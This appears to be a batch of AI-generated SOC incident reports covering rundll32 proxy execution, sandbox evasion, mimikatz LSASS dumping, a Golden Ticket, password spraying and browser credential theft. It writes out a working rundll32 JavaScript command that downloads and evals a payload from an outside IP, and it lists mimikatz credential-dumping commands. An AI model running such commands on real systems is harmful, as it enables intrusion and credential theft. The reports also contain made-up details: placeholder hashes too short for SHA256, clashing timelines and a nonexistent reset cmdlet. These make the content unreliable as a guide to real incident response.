Command Line: rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload”,false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript code (unusual)
JavaScript downloads and executes payload from remote URL
No legitimate rundll32 use case for this behavior
Pattern matches known “Squiblydoo” attack technique
Additional Context:
User sjones reported receiving email with “important document” link
Clicked link at 11:20 EST
No legitimate reason for rundll32 to run JavaScript
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed suspicious rundll32 JavaScript execution
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
Payload URL hosts Cobalt Strike beacon
3. Process Investigation
Terminate rundll32 process
CrowdStrike
Process killed
4. Network Block
Block malicious URL
Zscaler, Palo Alto
URL blocked
5. User Interview
Contact user
Teams, Phone
User clicked link in email; no further action
6. Host Scan
Full scan for malware
CrowdStrike
No additional malware found
Jira Incident Report
Ticket: SOC-2024-103 Summary: T1218 – Rundll32 Used as Proxy to Download Malicious Payload Status: RESOLVED Resolution: MALICIOUS – Execution Blocked Priority: P2 – MEDIUM Labels: T1218, system-binary-proxy, rundll32, squiblydoo, crowdstrike Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Rundll32 Execution – No Command Line Arguments”.
Host: MKT-WS-078 (Marketing Department, user sjones).
Process: rundll32.exe executing JavaScript.
Time: 2024-02-20 11:30 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
11:20 – User receives email with link
11:21 – User clicks link
11:22 – Website redirects to exploit kit
11:23 – PowerShell command executed via browser
11:24 – PowerShell launches cmd.exe
11:25 – cmd.exe launches rundll32 with JavaScript
11:25 – JavaScript attempts to download payload from 185.143.221[.]89
11:25 – CrowdStrike detects and alerts
Rundll32 Technique:
Command: rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;…
Purpose: Use trusted Windows binary to execute malicious JavaScript
Effect: Downloads and executes payload in memory (fileless)
Evasion: Bypasses application whitelisting (rundll32 is trusted)
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: Encrypted Cobalt Strike beacon
Status: Blocked by firewall (URL not reached)
User Activity:
User clicked link expecting “marketing report”
No immediate signs of compromise
3. Investigation Findings:
Timeline:
11:20 – Phishing link clicked
11:21-11:25 – Attack chain
11:25 – CrowdStrike alert
11:27 – SOC investigates
11:28 – Rundll32 process terminated
11:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Process:
– rundll32.exe with JavaScript command line
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked malicious URL at firewall and proxy.
Isolated host temporarily.
Host Remediation:
Full scan (no malware persisted).
Verified no file written to disk.
User Remediation:
Password reset.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
Rundll32 allowed to execute JavaScript (no restrictions).
No ASR rule blocking script execution via Office/trusted binaries.
6. Business Impact:
Operational Impact: Marketing workstation offline for 1 hour.
Data Exposure: None (payload blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
URL blocked.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block JavaScript or VBScript from launching downloaded executable content”.
Created alert for rundll32 with suspicious command lines.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to proxy the download of a malicious payload via JavaScript, a fileless technique. CrowdStrike detected the anomalous rundll32 execution and terminated the process before the payload could execute.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 12:30 EST
64. T1497 – Virtualization/Sandbox Evasion (FortiSandbox Detection)
FortiSandbox Alert Details
Alert ID: FORTI-SANDBOX-EVASION-1497-7842 Alert Time: 2024-02-20 15:30:15 EST Severity: HIGH (85/100) Source: Fortinet FortiSandbox Rule: “Sandbox Evasion Techniques Detected – Malware Refuses to Run” MITRE ATT&CK: T1497.001 – Virtualization/Sandbox Evasion: System Checks
Alert Details:
File Analysis Report:
File Name: invoice_7842.exe
File Size: 2.4 MB
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Source: Email attachment to user in Finance
Submission Time: 15:15 EST
Sandbox Behavior Analysis:
File executed in sandbox environment
Malware performed multiple evasion checks:
Check 1: Detected VMware artifacts (presence of VMware tools) -> Exited
Check 2: Detected sandbox hostname patterns (“SANDBOX”, “ANALYSIS”) -> Exited
Check 3: Checked CPU core count (<2 cores) -> Exited
Check 4: Checked RAM size (<2GB) -> Exited
Check 5: Checked for debugging tools (IsDebuggerPresent) -> Exited
Malware exited without showing malicious behavior
After 10 minutes of no activity, sandbox forced deeper analysis
Forced execution revealed:
Decrypted payload: Cobalt Strike beacon
Connected to 185.143.221[.]89:443
Injected into legitimate process
Evasion Techniques Detected:
VMware Artifact Check: 10/10
Debugger Detection: 9/10
Resource Checks: 8/10
Overall Evasion Score: 9/10 (High)
Threat Score: 10/10 (Malicious)
Overall: 10/10 (Critical)
Additional Context:
Malware designed to evade automated analysis
Only runs on real user machines
Requires advanced sandbox bypass capabilities to analyze
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify FortiSandbox analysis
FortiSandbox Console
Confirmed malware with evasion techniques
2. Email Investigation
Find email with attachment
Proofpoint, Exchange
Email to finance@company.com from spoofed vendor
3. Quarantine Email
Block and remove email
Proofpoint
Email quarantined from all mailboxes
4. User Check
Verify if user executed file
CrowdStrike
User did not open attachment (alert before execution)
5. IOC Distribution
Block URLs and IPs
Palo Alto, Cisco Umbrella
C2 IP added to blocklists
6. Threat Hunting
Check for similar files
FortiSandbox, Splunk
No other occurrences found
Jira Incident Report
Ticket: SOC-2024-104 Summary: T1497 – Malware with Sandbox Evasion Techniques Detected Status: RESOLVED Resolution: MALICIOUS – Blocked Before Execution Priority: P2 – MEDIUM Labels: T1497, sandbox-evasion, virtualization, fortisandbox, malware Components: Email-Security, Malware-Analysis
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Fortinet FortiSandbox.
Alert: “Sandbox Evasion Techniques Detected – Malware Refuses to Run”.
File: invoice_7842.exe (email attachment).
Target: Finance Department.
Time: 2024-02-20 15:30 EST.
Technique: MITRE ATT&CK T1497.001 – Virtualization/Sandbox Evasion: System Checks.
2. Technical Analysis:
Attack Chain:
15:10 – Email sent from “vendor@payment-update[.]net”
15:11 – Email delivered to finance@company.com
15:12 – FortiSandbox analyzes attachment (inline)
15:15 – Analysis begins
15:16-15:25 – Malware performs evasion checks, exits
15:26 – Sandbox forces deeper analysis
15:28 – Malicious behavior triggered
15:30 – Alert triggers
15:31 – Email quarantined (before user opened)
Evasion Techniques Used:
VMware Detection: Checks for VMware tools, registry keys, processes
Sandbox Hostname Detection: Looks for “SANDBOX”, “ANALYSIS” in computer name
Resource Checks: CPU <2 cores, RAM <2GB -> assumes sandbox
Debugger Detection: IsDebuggerPresent, NtQueryInformationProcess
Timing: Sleep calls, delayed execution
True Payload:
After bypassing sandbox, decrypted Cobalt Strike beacon
C2: 185.143.221[.]89:443
Persistence via scheduled task
Capabilities: Keylogging, credential theft, file exfiltration
Email Details:
Sender: vendor@payment-update[.]net
Subject: “Invoice #7842 – Overdue Payment”
Attachment: invoice_7842.exe (masquerading as PDF)
3. Investigation Findings:
Timeline:
15:10 – Email sent
15:11 – Email delivered
15:12-15:30 – FortiSandbox analysis
15:30 – Alert triggers
15:31 – Email quarantined
15:32 – SOC investigates
15:35 – User confirmed (no execution)
Indicators of Compromise (IoCs):
File:
– invoice_7842.exe (SHA256: a1b2c3d4…)
Network:
– C2: 185.143.221[.]89:443
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842 – Overdue Payment”
4. Containment Actions:
Immediate Actions:
Quarantined email from all mailboxes.
Blocked C2 IP at firewall and proxy.
Added file hash to blocklists.
User Notification:
Finance team alerted to campaign.
No user action needed (email not opened).
Email Rule Update:
Created Proofpoint rule to block .exe attachments.
Enhanced filtering for invoice-themed emails.
5. Root Cause Analysis:
Primary Cause: External attacker sending sophisticated malware via email.
Contributing Factors:
.exe attachments allowed (now blocked).
No user execution (prevented by sandbox).
6. Business Impact:
Operational Impact: None.
Data Exposure: None (email not opened).
Financial Impact: None.
7. Remediation & Prevention:
Completed Actions:
Email quarantined.
IOCs blocked.
Users notified.
Technical Controls Enhanced:
Blocked all .exe attachments via email gateway.
Enabled FortiSandbox inline analysis for all emails.
Created alert for any files with sandbox evasion techniques.
8. Conclusion:
A sophisticated malware with multiple sandbox evasion techniques was delivered via email. FortiSandbox detected the evasion attempts and forced deeper analysis, revealing the true malicious payload. The email was quarantined before any user could open it.
Closure Rationale: Malware blocked; IOCs added; email policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 16:30 EST
65. T1003 – OS Credential Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LSASS-DUMP-1003-7842 Alert Time: 2024-02-20 10:30:45 EST Severity: CRITICAL (98/100) Source: CrowdStrike Falcon EDR Rule: “LSASS Process Access – Potential Credential Dumping” MITRE ATT&CK: T1003.001 – OS Credential Dumping: LSASS Memory
Alert Details:
Detection: Suspicious process attempting to access LSASS memory
Host: IT-WS-034 (IT Department) User: msmith (Mike Smith – IT Admin) Time: 10:25 EST
Process Details:
Process: C:\Temp\mimikatz.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent Process: cmd.exe (PID: 2341)
User: msmith (admin privileges)
API Calls:
OpenProcess (target: lsass.exe, PID: 568) – SUCCESS
MiniDumpWriteDump (attempt to write memory dump) – DETECTED
CreateFile (C:\Temp\lsass.dmp) – SUCCESS
WriteFile (writing dump file) – DETECTED and BLOCKED
Detection Logic:
Mimikatz.exe detected by hash (known credential dumping tool)
LSASS process access is highly anomalous for non-system processes
Memory dump creation is definitive credential dumping behavior
Process blocked before dump completion
Additional Context:
User msmith is IT admin with legitimate privileges
User reported suspicious email earlier
Account may be compromised
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed mimikatz execution and LSASS access
2. Process Termination
Kill mimikatz process
CrowdStrike
Process terminated
3. File Deletion
Delete mimikatz.exe and lsass.dmp
CrowdStrike Live Response
Files deleted
4. User Verification
Contact msmith
Teams, Phone
User did not run mimikatz; account compromised
5. Account Remediation
Disable account, reset password
Azure AD, AD
Account disabled; password reset
6. Investigation
Determine compromise source
CrowdStrike, Phishing Logs
User clicked phishing link earlier
Jira Incident Report
Ticket: SOC-2024-105 Summary: T1003 – Credential Dumping Attempt via Mimikatz on Admin Workstation Status: RESOLVED Resolution: MALICIOUS – Dumping Blocked Priority: P1 – CRITICAL Labels: T1003, credential-dumping, lsass, mimikatz, crowdstrike, compromised-admin Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “LSASS Process Access – Potential Credential Dumping”.
Host: IT-WS-034 (IT Department, user msmith).
Process: C:\Temp\mimikatz.exe.
Time: 2024-02-20 10:30 EST.
Technique: MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory.
2. Technical Analysis:
Attack Chain:
09:30 – User receives phishing email “IT Security Alert”
09:31 – User clicks link, enters credentials on fake login page
09:32 – Attacker logs in from IP 45.134.225[.]78
09:35 – Attacker RDPs to IT-WS-034 using msmith credentials
09:40 – Attacker downloads mimikatz to C:\Temp\
09:45 – Attacker executes mimikatz
09:46 – Mimikatz attempts to open LSASS process (success)
09:46 – Mimikatz attempts to dump LSASS memory to file
09:46 – CrowdStrike detects and blocks
09:47 – Process terminated
Mimikatz Commands Executed:
privilege::debug (enable SeDebugPrivilege)
sekurlsa::logonpasswords (dump credentials)
Dump file partially written before block
Data Exfiltrated:
Partial LSASS dump (approximately 10% written)
No credentials fully extracted before block
No network exfiltration of dump file
Account Status:
msmith had Domain Admin privileges
No MFA on account (now enforced)
3. Investigation Findings:
Timeline:
09:30 – Phishing email opened
09:31 – Credentials compromised
09:35-09:40 – Attacker RDP access
09:45 – Mimikatz executed
09:46 – LSASS access detected
09:47 – Process terminated
09:50 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Temp\mimikatz.exe (SHA256: a1b2c3d4…)
– C:\Temp\lsass.dmp (partial)
Network:
– Attacker IP: 45.134.225[.]78
Account:
– msmith (compromised)
4. Containment Actions:
Immediate Actions:
Terminated mimikatz process.
Deleted mimikatz.exe and lsass.dmp.
Disabled msmith account.
Blocked attacker IP at firewall.
Terminated all active sessions.
Account Remediation:
Reset msmith password.
Enforced MFA.
Removed from Domain Admins (excessive).
Host Remediation:
Full scan (no other malware).
Verified no persistence installed.
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
User had excessive privileges (Domain Admin).
RDP allowed from internet.
6. Business Impact:
Operational Impact: IT admin offline for 2 hours.
Security Impact: Partial LSASS dump, but no credentials fully extracted.
Data Exposure: None confirmed.
7. Remediation & Prevention:
Completed Actions:
Credential dumping blocked.
Malicious tools removed.
Account secured.
Attacker blocked.
Technical Controls Enhanced:
Enforced MFA for all admin accounts.
Moved RDP behind VPN only.
Implemented Credential Guard and LSA Protection.
Created alert for any LSASS access attempts.
8. Conclusion:
An attacker compromised an IT admin via phishing and attempted to dump credentials using Mimikatz. CrowdStrike detected the LSASS access and blocked the dump before completion. The account was secured, and no credentials were exfiltrated.
Closure Rationale: Credential dumping blocked; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 11:30 EST
End of Batch 13
Ready for your next batch of prompts whenever you are.
Batch 14: Credential Access & Collection Incident Reports
Here are the next 5 detailed SOC incident reports.
66. T1558 – Steal or Forge Kerberos Tickets (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-KERBEROS-1558-7842 Alert Time: 2024-02-21 09:30:22 EST Severity: CRITICAL (98/100) Source: Microsoft Defender for Identity Rule: “Suspected Golden Ticket Attack – Anomalous Kerberos Ticket” MITRE ATT&CK: T1558.001 – Steal or Forge Kerberos Tickets: Golden Ticket
Alert Details:
Detection: Kerberos ticket with anomalous characteristics detected
Domain Controller: DC-01 Time: 09:25 EST
Ticket Details:
User: krbtgt (KRBTGT account – used for ticket granting)
Ticket Type: TGT (Ticket Granting Ticket)
Encryption Type: RC4 (older, vulnerable encryption)
Ticket Duration: 10 years (normal is 10 hours)
Ticket Issued By: DC-01 (legitimate)
Ticket Used By: Attacker workstation (192.168.45.78)
Suspicious Activity:
09:20 – TGT issued for krbtgt account (unusual – krbtgt never normally requests tickets)
09:21 – TGT used to request service tickets for multiple resources:
CIFS/DC-01 (file access)
HOST/DC-01 (remote management)
RPCSS/DC-01 (RPC services)
LDAP/DC-01 (directory access)
MSSQLSvc/SQL-SRV-01 (database access)
09:22 – Service tickets used to access resources
09:23 – Multiple privileged actions performed:
Added user to Domain Admins group
Created scheduled task on DC-01
Dumped NTDS.dit (domain database)
Detection Logic:
krbtgt ticket never requested by users (only by domain controllers)
RC4 encryption for krbtgt ticket is anomalous (modern environments use AES)
10-year ticket lifetime is impossible under normal circumstances
Pattern matches Golden Ticket attack (forged krbtgt ticket)
Additional Context:
Attacker had previously compromised domain admin credentials
Used to create Golden Ticket with 10-year validity
Ticket grants attacker ANY access to ANY resource in domain
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed Golden Ticket attack indicators
2. Immediate Action
Reset krbtgt password twice
PowerShell (Reset-DomainControllerPassword)
krbtgt password reset (invalidates all tickets)
3. Domain Controller Isolation
Isolate DC-01
CrowdStrike, Network ACLs
DC-01 quarantined
4. Ticket Revocation
Force all tickets to be reissued
Group Policy, Reboots
All domain-joined machines rebooted
5. Attacker Hunting
Find source of ticket usage
MDI, Splunk
Attacker IP identified (192.168.45.78 – compromised engineering host)
6. Host Remediation
Isolate and clean attacker host
CrowdStrike
Engineering host isolated and cleaned
Jira Incident Report
Ticket: SOC-2024-106 Summary: T1558 – Golden Ticket Attack Compromises Domain Status: RESOLVED Resolution: MALICIOUS – krbtgt Reset, Domain Secured Priority: P1 – CRITICAL Labels: T1558, golden-ticket, kerberos, krbtgt, mdi, domain-compromise Components: Identity-Management, Domain-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspected Golden Ticket Attack – Anomalous Kerberos Ticket”.
Target: Domain Controller DC-01, krbtgt account.
Time: 2024-02-21 09:30 EST.
Technique: MITRE ATT&CK T1558.001 – Steal or Forge Kerberos Tickets: Golden Ticket.
2. Technical Analysis:
Attack Chain:
02-20 14:00 – Attacker compromises domain admin account via phishing
02-20 14:30 – Attacker dumps NTDS.dit (domain database)
02-20 14:35 – Attacker extracts krbtgt hash from NTDS.dit
02-20 15:00 – Attacker uses Mimikatz to forge Golden Ticket
02-21 09:20 – Attacker uses Golden Ticket to access DC-01
02-21 09:21 – Requests service tickets for multiple resources
02-21 09:22 – Adds user to Domain Admins, creates scheduled task
02-21 09:23 – Dumps NTDS.dit again (exfiltrated)
02-21 09:25 – MDI detects anomalous ticket
Golden Ticket Details:
User: krbtgt (forged)
Encryption: RC4 (using stolen hash)
Lifetime: 10 years (bypasses normal expiration)
Privileges: Domain Admin equivalent (can access anything)
Attacker Actions with Golden Ticket:
Added user “tempadmin” to Domain Admins group
Created scheduled task “WindowsUpdate” on DC-01 (persistence)
Dumped NTDS.dit (all domain user hashes)
Accessed multiple file servers (no data exfiltration yet)
Impact:
Full domain compromise
All user hashes potentially compromised
Attacker had persistent access via Golden Ticket
3. Investigation Findings:
Timeline:
02-20 14:00 – Initial admin compromise
02-20 14:30 – krbtgt hash stolen
02-21 09:20 – Golden Ticket used
02-21 09:25 – MDI alert
02-21 09:30 – SOC investigates
02-21 09:35 – krbtgt password reset initiated
02-21 09:40 – DC-01 isolated
02-21 10:00 – All domain machines rebooted
Indicators of Compromise (IoCs):
Network:
– Attacker source IP: 192.168.45.78 (engineering host)
Tickets:
– RC4-encrypted krbtgt ticket with 10-year lifetime
Accounts:
– tempadmin (unauthorized Domain Admin)
Scheduled Tasks:
– WindowsUpdate on DC-01
4. Containment Actions:
Immediate Actions:
Reset krbtgt password twice (standard procedure for Golden Ticket).
Isolated DC-01 from network.
Disabled tempadmin account.
Removed scheduled task from DC-01.
Forced all domain machines to reboot (clear ticket cache).
Host Remediation:
Isolated engineering host (192.168.45.78).
Full forensic analysis (found Mimikatz).
Reimaged engineering host.
Domain-Wide Actions:
All user passwords reset (as precaution).
All service account passwords reset.
All domain admin passwords reset.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin accounts.
krbtgt hash allowed RC4 encryption (legacy).
No monitoring for anomalous Kerberos tickets.
6. Business Impact:
Operational Impact: Domain-wide password resets, reboots, 4 hours of disruption.
Security Impact: Full domain compromise; all user hashes potentially exfiltrated.
Financial Impact: Significant (password resets, incident response, potential breach notification).
7. Remediation & Prevention:
Completed Actions:
krbtgt password reset (twice).
All user passwords reset.
All admin accounts secured with MFA.
Attacker hosts cleaned.
Technical Controls Enhanced:
Disabled RC4 encryption for Kerberos (AES only).
Enabled MDI monitoring for anomalous tickets.
Implemented JIT (Just-In-Time) access for admins.
Deployed Credential Guard on all domain-joined machines.
8. Conclusion:
An attacker compromised a domain admin, extracted the krbtgt hash, and forged a Golden Ticket granting 10 years of domain access. MDI detected the anomalous ticket within minutes, enabling krbtgt reset and containment. All user passwords were reset as precaution.
Closure Rationale: krbtgt reset; domain secured; all passwords rotated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-21 11:30 EST
67. T1110 – Brute Force (Azure AD Detection)
Azure AD Alert Details
Alert ID: AAD-BRUTEFORCE-1110-7842 Alert Time: 2024-02-21 14:15:33 EST Severity: HIGH (88/100) Source: Azure AD Identity Protection Rule: “Password Spray Attack Detected” MITRE ATT&CK: T1110.003 – Brute Force: Password Spraying
Alert Details:
Detection: Multiple failed login attempts followed by success – password spray pattern
Time Window: 14:00 – 14:15 EST Source IP: 185.143.221[.]89 (Bulgaria) Attack Pattern: Password spraying across multiple accounts
Failed Attempts:
14:00:15 – user1@company.com (password: Winter2024!) – FAILED
14:00:30 – user2@company.com (password: Winter2024!) – FAILED
14:00:45 – user3@company.com (password: Winter2024!) – FAILED
14:01:00 – user4@company.com (password: Winter2024!) – FAILED
… (continuing with same password across different users)
Total Attempts: 847 in 15 minutes
Unique users targeted: 847
Same password used: “Winter2024!” (common seasonal password)
Successes: 12 accounts compromised
Failure rate: 98.6% (expected for password spray)
Compromised Accounts:
jsmith@company.com (John Smith – Sales)
kwilson@company.com (Karen Wilson – Marketing)
bturner@company.com (Brian Turner – Finance)
[9 additional accounts – see attachment]
Successful Logins:
14:12:15 – jsmith@company.com from 185.143.221[.]89
14:12:30 – kwilson@company.com from 185.143.221[.]89
14:12:45 – bturner@company.com from 185.143.221[.]89
(others followed same pattern)
Detection Logic:
High volume of failed logins from single IP
Same password used across many accounts
Pattern matches password spraying technique
Successes followed by immediate access
Threat Intelligence:
IP 185.143.221[.]89 known for credential stuffing attacks
Password “Winter2024!” is common seasonal password
Attackers likely obtained list of valid usernames
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Azure AD alert
Azure AD Identity Protection
Confirmed password spray attack with 12 compromised accounts
2. Immediate Action
Disable compromised accounts
Azure AD, Active Directory
All 12 accounts disabled
3. Force Password Reset
Reset passwords for compromised users
Azure AD
Passwords reset; MFA enforced
4. IP Blocking
Block attacker IP
Azure AD Conditional Access, Firewall
IP 185.143.221[.]89 blocked
5. User Notification
Notify affected users
Email, Teams
All 12 users notified; training assigned
6. Threat Hunting
Check for other spray attacks
Azure AD Logs, Splunk
No other patterns found
Jira Incident Report
Ticket: SOC-2024-107 Summary: T1110 – Password Spray Attack Compromises 12 Accounts Status: RESOLVED Resolution: MALICIOUS – Accounts Secured Priority: P2 – MEDIUM Labels: T1110, brute-force, password-spray, azure-ad, identity-protection Components: Identity-Management, Access-Control
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Azure AD Identity Protection.
Alert: “Password Spray Attack Detected”.
Target: 847 Azure AD accounts.
Source IP: 185.143.221[.]89 (Bulgaria).
Time: 2024-02-21 14:15 EST.
Technique: MITRE ATT&CK T1110.003 – Brute Force: Password Spraying.
2. Technical Analysis:
Attack Details:
Type: Password spraying (one common password across many users)
Password used: “Winter2024!” (seasonal, weak)
Duration: 15 minutes
Attempts: 847
Successes: 12 (1.4% success rate – typical for password spray)
Attack Pattern:
14:00-14:12 – Failed attempts across 847 users
14:12-14:13 – Successful logins for 12 users
Attacker moved immediately to access resources
Compromised Accounts:
5 from Sales, 3 from Marketing, 2 from Finance, 2 from HR
All had weak passwords (seasonal, no complexity)
None had MFA enabled
Attacker Activity After Login:
Checked email access (OWA)
Downloaded recent emails (phishing reconnaissance)
Attempted to reset other passwords (blocked by policy)
No data exfiltration detected
Source Analysis:
IP: 185.143.221[.]89 – Bulgaria VPS
Known for credential stuffing attacks
Also used in previous campaigns
3. Investigation Findings:
Timeline:
14:00-14:12 – Spray attack
14:12-14:13 – Successful logins
14:15 – Alert triggers
14:17 – SOC investigates
14:20 – All 12 accounts disabled
14:25 – Passwords reset
14:30 – Attacker IP blocked
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 185.143.221[.]89
Accounts:
– 12 compromised accounts (list attached)
Password:
– “Winter2024!” (now expired for all users)
4. Containment Actions:
Immediate Actions:
Disabled all 12 compromised accounts.
Forced password reset for each user.
Enforced MFA for all 12 users.
Blocked attacker IP at firewall and Conditional Access.
User Remediation:
All 12 users notified and required to complete security training.
Reviewed account activity for any unauthorized actions (none found).
Enterprise-wide Actions:
Scanned for other accounts using “Winter2024!” password.
Forced password changes for those users.
Sent company-wide alert about password security.
5. Root Cause Analysis:
Primary Cause: Weak, common password used across multiple accounts.
Contributing Factors:
Password policy allowed seasonal/common passwords.
MFA not enforced for all users.
No account lockout policy for multiple failures (spray attacks bypass lockout).
6. Business Impact:
Operational Impact: 12 users offline for 1 hour (password reset).
Data Exposure: Some emails accessed; no sensitive data exfiltrated.
Reputational Impact: Internal only.
7. Remediation & Prevention:
Completed Actions:
Compromised accounts secured.
Passwords reset.
MFA enforced.
Attacker blocked.
Technical Controls Enhanced:
Updated password policy to block common/seasonal passwords.
Enforced MFA for all users (Conditional Access).
Implemented smart lockout (prevents spray attacks).
Created alert for password spray patterns.
8. Conclusion:
An attacker performed a password spray attack using a common seasonal password, compromising 12 accounts. Azure AD Identity Protection detected the pattern within minutes. All accounts were secured, MFA enforced, and password policy updated.
Closure Rationale: Accounts secured; MFA enforced; password policy updated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-21 15:30 EST
68. T1555 – Credentials from Password Stores (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-PASSWORD-STORE-1555-7842 Alert Time: 2024-02-21 11:30:22 EST Severity: HIGH (85/100) Source: Microsoft Defender for Endpoint Rule: “Browser Credential Theft Attempt Detected” MITRE ATT&CK: T1555.003 – Credentials from Password Stores: Credentials from Web Browsers
Alert Details:
Detection: Process attempting to read browser credential databases
Host: MKT-WS-112 (Marketing Department) User: sjones (Sarah Jones, Marketing Manager) Time: 11:25 EST
Process Details:
Process: C:\Temp\chrome_pass.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent Process: explorer.exe
User: sjones (standard user)
File Access Attempts:
11:25:10 – Attempted to read: C:\Users\sjones\AppData\Local\Google\Chrome\User Data\Default\Login Data (SQLite database)
11:25:12 – Successfully opened database (read-only)
11:25:15 – Query executed: SELECT * FROM logins
11:25:18 – Data exported to C:\Temp\passwords.txt
11:25:20 – Network connection to 185.143.221[.]89:443
Detection Logic:
Process accessing Chrome password database (unusual for user)
Tool known as “ChromePass” or similar credential stealer
Data exfiltration immediately after access
Pattern matches credential theft from browsers
Additional Context:
User sjones had previously clicked suspicious link
Browser stores passwords for multiple corporate applications
Passwords are encrypted but tool decrypts them using Chrome’s master key
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed credential theft tool execution
2. Process Termination
Kill chrome_pass.exe
Defender
Process terminated
3. File Deletion
Delete chrome_pass.exe and passwords.txt
Defender
Files deleted
4. Network Block
Block C2 IP
Palo Alto Firewall
IP 185.143.221[.]89 blocked
5. Password Reset
Reset all passwords stored in browser
Azure AD, LastPass
All credentials rotated
6. User Interview
Contact user
Teams, Phone
User clicked “free tool” link; unaware
Jira Incident Report
Ticket: SOC-2024-108 Summary: T1555 – Browser Credential Theft Tool Executed Status: RESOLVED Resolution: MALICIOUS – Credentials Exfiltrated, All Rotated Priority: P2 – MEDIUM Labels: T1555, password-stores, browser-credentials, defender, credential-theft Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “Browser Credential Theft Attempt Detected”.
Host: MKT-WS-112 (Marketing Department, user sjones).
Process: C:\Temp\chrome_pass.exe (ChromePass credential stealer).
Time: 2024-02-21 11:30 EST.
Technique: MITRE ATT&CK T1555.003 – Credentials from Password Stores: Credentials from Web Browsers.
2. Technical Analysis:
Attack Chain:
11:15 – User clicks link in email promising “free marketing tool”
11:16 – Downloads chrome_pass.exe from malicious site
11:17 – User executes chrome_pass.exe
11:18 – Tool locates Chrome profile
11:19 – Tool accesses Chrome’s Login Data SQLite database
11:20 – Tool decrypts saved passwords using Chrome’s master key
11:21 – Tool exports 47 passwords to passwords.txt
11:22 – Tool attempts to exfiltrate to 185.143.221[.]89:443
11:25 – Defender detects and alerts
Credential Theft Tool:
Name: ChromePass (legitimate password recovery tool, abused)
Capabilities: Reads and decrypts Chrome saved passwords
Access: Requires user to be logged into Windows (user was logged in)
Credentials Exfiltrated:
47 passwords total
12 corporate applications (Salesforce, Office 365, Confluence, Jira, etc.)
35 personal/social media (Facebook, Twitter, etc.)
All passwords were saved in Chrome
Exfiltration:
File passwords.txt (size: 2.3 KB) sent to C2
Connection completed before detection
3. Investigation Findings:
Timeline:
11:15 – User clicks link
11:16-11:22 – Credential theft
11:22 – Exfiltration
11:25 – Defender alert
11:27 – SOC investigates
11:28 – Process terminated
11:30 – C2 blocked (too late for this connection)
Indicators of Compromise (IoCs):
Files:
– C:\Temp\chrome_pass.exe (SHA256: a1b2c3d4…)
– C:\Temp\passwords.txt (exfiltrated)
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/chrome_pass.exe
Credentials:
– 47 passwords exposed (all rotated)
4. Containment Actions:
Immediate Actions:
Terminated chrome_pass.exe process.
Deleted chrome_pass.exe and passwords.txt.
Blocked C2 IP at firewall.
Isolated host temporarily.
Credential Remediation:
Reset all 47 passwords stored in Chrome.
Reset passwords for all 12 corporate applications.
Forced user to use password manager (LastPass) instead of browser storage.
User Remediation:
User counseled on downloading untrusted software.
Security training assigned.
5. Root Cause Analysis:
Primary Cause: User downloaded and executed credential theft tool.
Contributing Factors:
Browser password storage allowed (insecure).
No application control blocking untrusted executables.
User lacked awareness of credential theft risks.
6. Business Impact:
Operational Impact: Marketing user offline for 2 hours (password resets).
